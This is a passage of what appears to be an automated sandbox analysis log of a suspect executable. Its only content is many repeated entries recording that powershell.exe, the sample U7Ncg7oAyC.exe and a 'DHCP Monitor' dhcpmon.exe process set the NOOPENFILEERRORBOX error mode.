        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
